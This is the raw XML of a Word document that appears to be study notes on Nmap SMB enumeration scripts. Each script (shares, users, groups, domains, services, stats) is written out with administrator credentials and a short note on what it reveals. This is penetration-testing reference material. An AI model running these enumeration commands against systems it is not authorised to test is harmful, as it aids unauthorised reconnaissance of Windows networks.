                        <wp:posOffset>119964</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="2750024" cy="682160"/>
                      <wp:effectExtent l="0" t="0" r="12700" b="2286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024" cy="6821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9F4" w:rsidRDefault="003229F4" w:rsidP="009F6E91">
                                  <w:r w:rsidRPr="00D16CAE">
                                    <w:t>smb-enum-shares,smb-ls --script-args smbusername=administrator,smbpassword=password IP_address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34A026" id="Rounded Rectangle 16" o:spid="_x0000_s1036" style="position:absolute;margin-left:-1.65pt;margin-top:9.45pt;width:216.55pt;height:53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G1cQIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVN9P2zAQfp+0/8Hy+0gTlcIqUlSBmCYh&#10;QIWJZ9ex22iOzzu7Tbq/fmcnDYghbZr2kvh8v7/7zheXXWPYXqGvwZY8P5lwpqyEqrabkn97uvl0&#10;zpkPwlbCgFUlPyjPLxcfP1y0bq4K2IKpFDIKYv28dSXfhuDmWeblVjXCn4BTlpQasBGBRNxkFYqW&#10;ojcmKyaTWdYCVg5BKu/p9rpX8kWKr7WS4V5rrwIzJafaQvpi+q7jN1tciPkGhdvWcihD/EMVjagt&#10;JR1DXYsg2A7r30I1tUTwoMOJhCYDrWupUg/UTT55083jVjiVeiFwvBth8v8vrLzbPyCrK5rdjDMr&#10;GprRCna2UhVbEXrCboxipCOgWufnZP/oHnCQPB1j153GJv6pH9YlcA8juKoLTNJlcXY6mRRTziTp&#10;ZudFPkvoZy/eDn34oqBh8VByjGXEGhKwYn/rA6Ul+6MdCbGkvoh0CgejYh3GrpSmrihtnrwTn9SV&#10;QbYXxAQhpbLhNDZF8ZJ1dNO1MaNj8WfHwT66qsS10fkvso4eKTPYMDo3tQV8L3v1PR9K1r39EYG+&#10;7whB6NZdP86EbrxaQ3WgGSP05PdO3tQE8K3w4UEgsZ32gjY43NNHG2hLDsOJsy3gz/fuoz2RkLSc&#10;tbQ9Jfc/dgIVZ+arJXp+zqfTuG5JmJ6eFSTga836tcbumiugseT0VjiZjtE+mONRIzTPtOjLmJVU&#10;wkrKXXIZ8ChchX6r6amQarlMZrRiToRb++jkkQiRO0/ds0A3sCwQP+/guGli/oZnvW0ckYXlLoCu&#10;EwlfcB1GQOuZuDQ8JXH/X8vJ6uXBW/wCAAD//wMAUEsDBBQABgAIAAAAIQDOUSFl3AAAAAkBAAAP&#10;AAAAZHJzL2Rvd25yZXYueG1sTI/NTsMwEITvSLyDtUjcWqdOVdo0TkURHDjS8gBuvE2ixusodn7g&#10;6VlOcNyZ0ew3+WF2rRixD40nDatlAgKp9LahSsPn+W2xBRGiIWtaT6jhCwMcivu73GTWT/SB4ylW&#10;gksoZEZDHWOXSRnKGp0JS98hsXf1vTORz76StjcTl7tWqiTZSGca4g+16fClxvJ2GpyGV3u82vcb&#10;DU9HF7rvaa1MMiqtHx/m5z2IiHP8C8MvPqNDwUwXP5ANotWwSFNOsr7dgWB/rXY85cKC2qQgi1z+&#10;X1D8AAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABb&#10;Q29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAA&#10;AAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAMh4cbVxAgAAOAUAAA4AAAAAAAAAAAAA&#10;AAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAM5RIWXcAAAACQEAAA8AAAAAAAAA&#10;AAAAAAAAywQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADUBQ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3229F4" w:rsidRDefault="003229F4" w:rsidP="009F6E91">
                            <w:r w:rsidRPr="00D16CAE">
                              <w:t>smb-enum-shares,smb-ls --script-args smbusername=administrator,smbpassword=password IP_address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Pr="0051746D" w:rsidRDefault="0051746D" w:rsidP="0051746D"/>
          <w:p w:rsidR="0051746D" w:rsidRDefault="0051746D" w:rsidP="0051746D"/>
          <w:p w:rsidR="0051746D" w:rsidRDefault="0051746D" w:rsidP="0051746D"/>
          <w:p w:rsidR="002D3673" w:rsidRDefault="002D3673" w:rsidP="002D3673"/>
          <w:p w:rsidR="00A13BA3" w:rsidRDefault="00A13BA3" w:rsidP="002D3673"/>
          <w:p w:rsidR="002F773F" w:rsidRDefault="00B90091" w:rsidP="002D3673">
            <w:r w:rsidRPr="00D16CAE">
              <w:t xml:space="preserve">- “smb-ls” tells us what's inside each of the </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B90091" w:rsidRPr="0051746D" w:rsidRDefault="002F773F" w:rsidP="002D3673">
            <w:r>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
            <w:r w:rsidR="00B90091" w:rsidRPr="00D16CAE">
              <w:t>shares like finding directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4609" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0051746D" w:rsidRDefault="009F6E91" w:rsidP="005F0D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EF8CA4A" wp14:editId="09756F7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121539</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="2736376" cy="709295"/>
                      <wp:effectExtent l="0" t="0" r="26035" b="1460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376" cy="7092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5F0D9E">
                                    <w:t>smb-enum-users --script-args smbusername=administrator,smbpassword=password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F8CA4A" id="Rounded Rectangle 11" o:spid="_x0000_s1037" style="position:absolute;margin-left:2.65pt;margin-top:9.55pt;width:215.45pt;height:5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pcAIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVNtOGzEQfa/Uf7D8XjYJgZSIDYqCqCoh&#10;iICKZ8drJ6t6Pe7YyW769R17LyCK1Krqi9ezcz9zxpdXTWXYQaEvweZ8fDLiTFkJRWm3Of/2dPPp&#10;M2c+CFsIA1bl/Kg8v1p8/HBZu7mawA5MoZBREOvntcv5LgQ3zzIvd6oS/gScsqTUgJUIJOI2K1DU&#10;FL0y2WQ0Os9qwMIhSOU9/b1ulXyR4mutZLjX2qvATM6ptpBOTOcmntniUsy3KNyulF0Z4h+qqERp&#10;KekQ6loEwfZY/haqKiWCBx1OJFQZaF1KlXqgbsajN9087oRTqRcCx7sBJv//wsq7wxpZWdDsxpxZ&#10;UdGMHmBvC1WwB0JP2K1RjHQEVO38nOwf3Ro7ydM1dt1orOKX+mFNAvc4gKuawCT9nMxOz09n55xJ&#10;0s1GF5OLsxg0e/F26MMXBRWLl5xjLCPWkIAVh1sfWvvejpxjSW0R6RaORsU6jH1QmrqitOPknfik&#10;VgbZQRAThJTKhj5/so5uujRmcJz82bGzj64qcW1w/ousg0fKDDYMzlVpAd/LXnxPcyDIdGvfI9D2&#10;HSEIzabpx9kNaQPFkWaM0JLfO3lTEsC3woe1QGI77QVtcLinQxuocw7djbMd4M/3/kd7IiFpOatp&#10;e3Luf+wFKs7MV0v0vBhPp3HdkjA9m01IwNeazWuN3VcroLEQA6m6dI32wfRXjVA906IvY1ZSCSsp&#10;d85lwF5YhXar6amQarlMZrRiToRb++hkT4TInafmWaDrWBaIn3fQb5qYv+FZaxtHZGG5D6DLRMII&#10;dYtrNwJaz8Tl7imJ+/9aTlYvD97iFwAAAP//AwBQSwMEFAAGAAgAAAAhAADieBDcAAAACAEAAA8A&#10;AABkcnMvZG93bnJldi54bWxMj81OwzAQhO9IvIO1SNyo3aSUNo1TUQQHjhQeYBu7SdR4HcXODzw9&#10;y4ked2Y0+02+n10rRtuHxpOG5UKBsFR601Cl4evz7WEDIkQkg60nq+HbBtgXtzc5ZsZP9GHHY6wE&#10;l1DIUEMdY5dJGcraOgwL31li7+x7h5HPvpKmx4nLXSsTpdbSYUP8ocbOvtS2vBwHp+HVHM7m/ULD&#10;08GF7mdaJajGROv7u/l5ByLaOf6H4Q+f0aFgppMfyATRanhMOcjydgmC7VW6TkCcWEjVBmSRy+sB&#10;xS8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtD&#10;b250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAA&#10;AAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAnSAFKXACAAA4BQAADgAAAAAAAAAAAAAA&#10;AAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAAOJ4ENwAAAAIAQAADwAAAAAAAAAA&#10;AAAAAADKBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANMF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5F0D9E">
                              <w:t>smb-enum-users --script-args smbusername=administrator,smbpassword=password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1746D" w:rsidRPr="0051746D" w:rsidRDefault="0051746D" w:rsidP="0051746D"/>
          <w:p w:rsidR="0051746D" w:rsidRDefault="0051746D" w:rsidP="0051746D"/>
          <w:p w:rsidR="0051746D" w:rsidRDefault="0051746D" w:rsidP="0051746D"/>
          <w:p w:rsidR="0051746D" w:rsidRDefault="0051746D" w:rsidP="0051746D">
            <w:pPr>
              <w:ind w:firstLine="720"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00A13BA3" w:rsidRDefault="00A13BA3" w:rsidP="0051746D">
            <w:pPr>
              <w:ind w:firstLine="720"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="002F773F" w:rsidRDefault="002D3673" w:rsidP="00B90091">
            <w:pPr>
              <w:ind w:firstLine="138"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r w:rsidR="00B90091">
              <w:t>T</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">o enumerate user accounts on a target </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002D3673" w:rsidRPr="0051746D" w:rsidRDefault="002F773F" w:rsidP="00B90091">
            <w:pPr>
              <w:ind w:firstLine="138"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidR="002D3673">
              <w:t>system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0051746D" w:rsidTr="00F877C1">
        <w:trPr>
          <w:trHeight w:val="1807"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4609" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B90091" w:rsidRDefault="00B90091" w:rsidP="003229F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166DE54" wp14:editId="526C05B8">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>-2743</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>36576</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="2763520" cy="680035"/>
                      <wp:effectExtent l="0" t="0" r="1778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520" cy="6800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D16CAE">
                                    <w:t>smb-enum-stats --script-args smbusername=administrator,smbpassword=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6DE54" id="Rounded Rectangle 12" o:spid="_x0000_s1038" style="position:absolute;margin-left:-.2pt;margin-top:2.9pt;width:217.6pt;height:5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6XbgIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVNtOGzEQfa/Uf7D8XjYJ10ZsUASiqoQA&#10;ARXPjtdOVrU97tjJbvr1HXsvIIrUquqLd7xzP3PG5xetNWynMNTgSj49mHCmnISqduuSf3u6/nTG&#10;WYjCVcKAUyXfq8AvFh8/nDd+rmawAVMpZBTEhXnjS76J0c+LIsiNsiIcgFeOlBrQikhXXBcVioai&#10;W1PMJpOTogGsPIJUIdDfq07JFzm+1krGO62DisyUnGqL+cR8rtJZLM7FfI3Cb2rZlyH+oQorakdJ&#10;x1BXIgq2xfq3ULaWCAF0PJBgC9C6lir3QN1MJ2+6edwIr3IvBE7wI0zh/4WVt7t7ZHVFs5tx5oSl&#10;GT3A1lWqYg+EnnBroxjpCKjGhznZP/p77G+BxNR1q9GmL/XD2gzufgRXtZFJ+jk7PTk8ntEMJOlO&#10;ziaTw+MUtHjx9hjiFwWWJaHkmMpINWRgxe4mxM5+sCPnVFJXRJbi3qhUh3EPSlNXlHaavTOf1KVB&#10;thPEBCGlcnHIn62Tm66NGR1nf3bs7ZOrylwbnf8i6+iRM4OLo7OtHeB72avv0x4y3dkPCHR9Jwhi&#10;u2qHcfZDWkG1pxkjdOQPXl7XBPCNCPFeILGdZkIbHO/o0AaakkMvcbYB/Pne/2RPJCQtZw1tT8nD&#10;j61AxZn56oien6dHR2nd8uXo+DTNHV9rVq81bmsvgcYypbfCyywm+2gGUSPYZ1r0ZcpKKuEk5S65&#10;jDhcLmO31fRUSLVcZjNaMS/ijXv0ciBC4s5T+yzQ9yyLxM9bGDZNzN/wrLNNI3Kw3EbQdSZhgrrD&#10;tR8BrWfmcv+UpP1/fc9WLw/e4hcAAAD//wMAUEsDBBQABgAIAAAAIQDUEhE02QAAAAcBAAAPAAAA&#10;ZHJzL2Rvd25yZXYueG1sTI7LTsMwEEX3SPyDNUjsWqchvEKciiJYsGzhA6bxNIkaj6PYecDXM6xg&#10;N1f36M4ptovr1ERDaD0b2KwTUMSVty3XBj4/3lYPoEJEtth5JgNfFGBbXl4UmFs/856mQ6yVjHDI&#10;0UATY59rHaqGHIa174mlO/nBYZQ41NoOOMu463SaJHfaYcvyocGeXhqqzofRGXi1u5N9P/N4v3Oh&#10;/56zFJMpNeb6anl+AhVpiX8w/OqLOpTidPQj26A6A6tMQAO34i9tdpPJcRRskz6CLgv937/8AQAA&#10;//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVu&#10;dF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEA&#10;AF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhANafjpduAgAAOAUAAA4AAAAAAAAAAAAAAAAALgIA&#10;AGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhANQSETTZAAAABwEAAA8AAAAAAAAAAAAAAAAA&#10;yAQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAADOBQ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D16CAE">
                              <w:t>smb-enum-stats --script-args smbusername=administrator,smbpassword= password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90091" w:rsidRPr="00B90091" w:rsidRDefault="00B90091" w:rsidP="00B90091"/>
          <w:p w:rsidR="00B90091" w:rsidRDefault="00B90091" w:rsidP="00B90091"/>
          <w:p w:rsidR="00B90091" w:rsidRDefault="00B90091" w:rsidP="00B90091"/>
          <w:p w:rsidR="00B90091" w:rsidRDefault="00B90091" w:rsidP="00B90091"/>
          <w:p w:rsidR="00B90091" w:rsidRDefault="00B90091" w:rsidP="00B90091">
            <w:r>
              <w:t>- Server statistics:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B90091" w:rsidRDefault="00B90091" w:rsidP="00B90091">
            <w:r>
              <w:tab/>
              <w:t>- How many files are sent</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B90091" w:rsidRDefault="00B90091" w:rsidP="00B90091">
            <w:r>
              <w:tab/>
              <w:t>- Failed Logins</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0051746D" w:rsidRPr="00B90091" w:rsidRDefault="00B90091" w:rsidP="00B90091">
            <w:r>
              <w:tab/>
              <w:t>- Permissions etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4609" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B90091" w:rsidRDefault="009F6E91" w:rsidP="005F0D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75EDE65" wp14:editId="7D86981D">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>19634</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>30861</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="2757805" cy="680085"/>
                      <wp:effectExtent l="0" t="0" r="23495" b="2476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805" cy="6800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746D" w:rsidRDefault="0051746D" w:rsidP="009F6E91">
                                  <w:r w:rsidRPr="00D16CAE">
                                    <w:t>smb-enum-domains --script-args smbusername=administrator,smbpassword=password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EDE65" id="Rounded Rectangle 13" o:spid="_x0000_s1039" style="position:absolute;margin-left:1.55pt;margin-top:2.45pt;width:217.15pt;height:5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rEbwIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVG1P2zAQ/j5p/8Hy95G0o1AqUlSBmCYh&#10;QMDEZ9ex22iOzzu7Tbpfv7PzAmJIm6Z9cXy59+ee8/lFWxu2V+grsAWfHOWcKSuhrOym4N+erj/N&#10;OfNB2FIYsKrgB+X5xfLjh/PGLdQUtmBKhYyCWL9oXMG3IbhFlnm5VbXwR+CUJaUGrEUgETdZiaKh&#10;6LXJpnl+kjWApUOQynv6e9Up+TLF11rJcKe1V4GZglNtIZ2YznU8s+W5WGxQuG0l+zLEP1RRi8pS&#10;0jHUlQiC7bD6LVRdSQQPOhxJqDPQupIq9UDdTPI33TxuhVOpFwLHuxEm///Cytv9PbKqpNl95syK&#10;mmb0ADtbqpI9EHrCboxipCOgGucXZP/o7rGXPF1j163GOn6pH9YmcA8juKoNTNLP6ensdJ7POJOk&#10;O5nn+XwWg2Yv3g59+KKgZvFScIxlxBoSsGJ/40NnP9iRcyypKyLdwsGoWIexD0pTV5R2krwTn9Sl&#10;QbYXxAQhpbJhyJ+so5uujBkdp3927O2jq0pcG53/IuvokTKDDaNzXVnA97KX3yc9ZLqzHxDo+o4Q&#10;hHbdDuPsh7SG8kAzRujI7528rgjgG+HDvUBiO+0FbXC4o0MbaAoO/Y2zLeDP9/5HeyIhaTlraHsK&#10;7n/sBCrOzFdL9DybHB/HdUvC8ex0SgK+1qxfa+yuvgQay4TeCifTNdoHM1w1Qv1Mi76KWUklrKTc&#10;BZcBB+EydFtNT4VUq1UyoxVzItzYRycHIkTuPLXPAl3PskD8vIVh08TiDc862zgiC6tdAF0lEkao&#10;O1z7EdB6Ji73T0nc/9dysnp58Ja/AAAA//8DAFBLAwQUAAYACAAAACEALcRukdoAAAAHAQAADwAA&#10;AGRycy9kb3ducmV2LnhtbEyOzU7DMBCE70h9B2srcaN20ohCiFNRBAeOtDzANt4mUeN1FDs/8PSY&#10;ExxH82nmK/aL7cREg28da0g2CgRx5UzLtYbP09vdAwgfkA12jknDF3nYl6ubAnPjZv6g6RhqEUfY&#10;56ihCaHPpfRVQxb9xvXEsbu4wWKIcailGXCO47aTqVL30mLL8aHBnl4aqq7H0Wp4NYeLeb/yuDtY&#10;33/PWYpqSrW+XS/PTyACLeEPhl/9qA5ldDq7kY0XnYZtEkEN2SOI2GbbXQbiHLEkVSDLQv73L38A&#10;AAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250&#10;ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAv&#10;AQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEABrxaxG8CAAA4BQAADgAAAAAAAAAAAAAAAAAu&#10;AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEALcRukdoAAAAHAQAADwAAAAAAAAAAAAAA&#10;AADJBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANAF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1746D" w:rsidRDefault="0051746D" w:rsidP="009F6E91">
                            <w:r w:rsidRPr="00D16CAE">
                              <w:t>smb-enum-domains --script-args smbusername=administrator,smbpassword=password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90091" w:rsidRPr="00B90091" w:rsidRDefault="00B90091" w:rsidP="00B90091"/>
          <w:p w:rsidR="00B90091" w:rsidRDefault="00B90091" w:rsidP="00B90091"/>
          <w:p w:rsidR="00B90091" w:rsidRDefault="00B90091" w:rsidP="00B90091"/>
          <w:p w:rsidR="00B90091" w:rsidRDefault="00B90091" w:rsidP="00B90091"/>
          <w:p w:rsidR="0051746D" w:rsidRDefault="00B90091" w:rsidP="00A13BA3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>- T</w:t>
            </w:r>
            <w:r w:rsidRPr="00B90091">
              <w:t>o enumerate domain information from target systems</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A13BA3" w:rsidRDefault="00B90091" w:rsidP="00A13BA3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>- M</w:t>
            </w:r>
            <w:r w:rsidRPr="00B90091">
              <w:t>ay retrieve details such as domain nam</w:t>
            </w:r>
            <w:r>
              <w:t>es,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A13BA3" w:rsidRDefault="00B90091" w:rsidP="00A13BA3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00A13BA3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">domain controllers, trusts </w:t>
            </w:r>
            <w:r w:rsidRPr="00B90091">
              <w:t xml:space="preserve">and other relevant </w:t>
            </w:r>
            <w:r w:rsidR="00A13BA3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A13BA3" w:rsidRDefault="00A13BA3" w:rsidP="00A13BA3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidR="00B90091" w:rsidRPr="00B90091">
              <w:t xml:space="preserve">information about the Windows domain </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B90091" w:rsidRDefault="00A13BA3" w:rsidP="00A13BA3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidR="00B90091" w:rsidRPr="00B90091">
              <w:t>environment.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A13BA3" w:rsidRPr="00B90091" w:rsidRDefault="00A13BA3" w:rsidP="00A13BA3">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003229F4" w:rsidTr="00F877C1">
        <w:trPr>
          <w:trHeight w:val="1807"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4609" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003229F4" w:rsidRDefault="003229F4" w:rsidP="005F0D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9B6A5CF" wp14:editId="2F03D4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-1397</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="2763672" cy="702859"/>
                      <wp:effectExtent l="0" t="0" r="17780" b="2159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672" cy="70285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9F4" w:rsidRDefault="003229F4" w:rsidP="009F6E91">
                                  <w:r w:rsidRPr="00D16CAE">
                                    <w:t>smb-enum-groups --script-args smbusername=administrator,smbpassword=password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6A5CF" id="Rounded Rectangle 14" o:spid="_x0000_s1040" style="position:absolute;margin-left:-.5pt;margin-top:-.1pt;width:217.6pt;height:5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rScAIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVG1P2zAQ/j5p/8Hy95E2KxQ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Jc1uxpkV&#10;Nc3oAXa2VCV7IPSE3RjFSEdANc4vyP7R3WMvebrGrluNdfxSP6xN4B5GcFUbmKSf+fzk88k850yS&#10;bj7JT4/PYtDsxduhD18U1CxeCo6xjFhDAlbsb3zo7Ac7co4ldUWkWzgYFesw9kFp6orSTpN34pO6&#10;NMj2gpggpFQ2HPf5k3V005Uxo2P+Z8fePrqqxLXR+S+yjh4pM9gwOteVBXwve/l92pesO/sBga7v&#10;CEFo1+0wzn5IaygPNGOEjvzeyeuKAL4RPtwLJLbTXtAGhzs6tIGm4NDfONsC/nzvf7QnEpKWs4a2&#10;p+D+x06g4sx8tUTPs+lsFtctCbPjeU4CvtasX2vsrr4EGsuU3gon0zXaBzNcNUL9TIu+illJJayk&#10;3AWXAQfhMnRbTU+FVKtVMqMVcyLc2EcnByJE7jy1zwJdz7JA/LyFYdPE4g3POts4IgurXQBdJRJG&#10;qDtc+xHQeiYu909J3P/XcrJ6efCWvwAAAP//AwBQSwMEFAAGAAgAAAAhAPA69rbbAAAACAEAAA8A&#10;AABkcnMvZG93bnJldi54bWxMj81OxDAMhO9IvENkJG67aUv5UWm6YhEcOLLwAN7G21bbOFWT/sDT&#10;Y05wsq0Zjb8pd6vr1Uxj6DwbSLcJKOLa244bA58fr5sHUCEiW+w9k4EvCrCrLi9KLKxf+J3mQ2yU&#10;hHAo0EAb41BoHeqWHIatH4hFO/nRYZRzbLQdcZFw1+ssSe60w47lQ4sDPbdUnw+TM/Bi9yf7dubp&#10;fu/C8L3kGSZzZsz11fr0CCrSGv/M8Isv6FAJ09FPbIPqDWxSqRJlZqBEzm9yWY7iS5Nb0FWp/xeo&#10;fgAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0Nv&#10;bnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAA&#10;AC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCVaCrScAIAADgFAAAOAAAAAAAAAAAAAAAA&#10;AC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQDwOva22wAAAAgBAAAPAAAAAAAAAAAA&#10;AAAAAMoEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA0gUAAAAA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3229F4" w:rsidRDefault="003229F4" w:rsidP="009F6E91">
                            <w:r w:rsidRPr="00D16CAE">
                              <w:t>smb-enum-groups --script-args smbusername=administrator,smbpassword=password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229F4" w:rsidRPr="003229F4" w:rsidRDefault="003229F4" w:rsidP="003229F4"/>
          <w:p w:rsidR="003229F4" w:rsidRDefault="003229F4" w:rsidP="003229F4"/>
          <w:p w:rsidR="003229F4" w:rsidRDefault="003229F4" w:rsidP="003229F4"/>
          <w:p w:rsidR="009F6E91" w:rsidRDefault="009F6E91" w:rsidP="003229F4"/>
          <w:p w:rsidR="003229F4" w:rsidRDefault="003229F4" w:rsidP="003229F4">
            <w:r w:rsidRPr="00D16CAE">
              <w:t>- Provides list of users in Groups</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B90091" w:rsidRPr="005F0D9E" w:rsidRDefault="00B90091" w:rsidP="003229F4">
            <w:r>
              <w:t>- M</w:t>
            </w:r>
            <w:r w:rsidRPr="00B90091">
              <w:t>ay retrieve group names, memberships</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> etc.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003229F4" w:rsidRPr="003229F4" w:rsidRDefault="003229F4" w:rsidP="003229F4"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4609" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003229F4" w:rsidRDefault="003229F4" w:rsidP="005F0D9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436C670" wp14:editId="5467A056">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>762</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>966</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="2777158" cy="702310"/>
                      <wp:effectExtent l="0" t="0" r="23495" b="2159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7158" cy="7023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9F4" w:rsidRDefault="003229F4" w:rsidP="009F6E91">
                                  <w:r w:rsidRPr="00D16CAE">
                                    <w:t>smb-enum-services --script-args smbusername=administrator,smbpassword=password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36C670" id="Rounded Rectangle 15" o:spid="_x0000_s1041" style="position:absolute;margin-left:.05pt;margin-top:.1pt;width:218.65pt;height:5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tGcgIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVG1P2zAQ/j5p/8Hy95Gmg5VVTVFVxDQJ&#10;AQImPruO3UZzfN7ZbdL9+p2dFxBD2jTti+PLvT/3nBcXbW3YQaGvwBY8P5lwpqyEsrLbgn97vPpw&#10;zpkPwpbCgFUFPyrPL5bv3y0aN1dT2IEpFTIKYv28cQXfheDmWeblTtXCn4BTlpQasBaBRNxmJYqG&#10;otcmm04mn7IGsHQIUnlPfy87JV+m+ForGW619iowU3CqLaQT07mJZ7ZciPkWhdtVsi9D/EMVtags&#10;JR1DXYog2B6r30LVlUTwoMOJhDoDrSupUg/UTT551c3DTjiVeiFwvBth8v8vrLw53CGrSprdGWdW&#10;1DSje9jbUpXsntATdmsUIx0B1Tg/J/sHd4e95Okau2411vFL/bA2gXscwVVtYJJ+TmezWX5GdJCk&#10;m02mH/OEfvbs7dCHLwpqFi8Fx1hGrCEBKw7XPlBash/sSIgldUWkWzgaFesw9l5p6orS5sk78Umt&#10;DbKDICYIKZUNqSmKl6yjm66MGR2nf3bs7aOrSlwbnf8i6+iRMoMNo3NdWcC3spff8zgHKll39gMC&#10;Xd8RgtBu2mGc/ZA2UB5pxggd+b2TVxUBfC18uBNIbKe9oA0Ot3RoA03Bob9xtgP8+db/aE8kJC1n&#10;DW1Pwf2PvUDFmflqiZ6f89PTuG5JOD2bTUnAl5rNS43d12ugseT0VjiZrtE+mOGqEeonWvRVzEoq&#10;YSXlLrgMOAjr0G01PRVSrVbJjFbMiXBtH5wciBC589g+CXQ9ywLx8waGTRPzVzzrbOOILKz2AXSV&#10;SBih7nDtR0DrmQbTPyVx/1/Kyer5wVv+AgAA//8DAFBLAwQUAAYACAAAACEAE+pXedcAAAAFA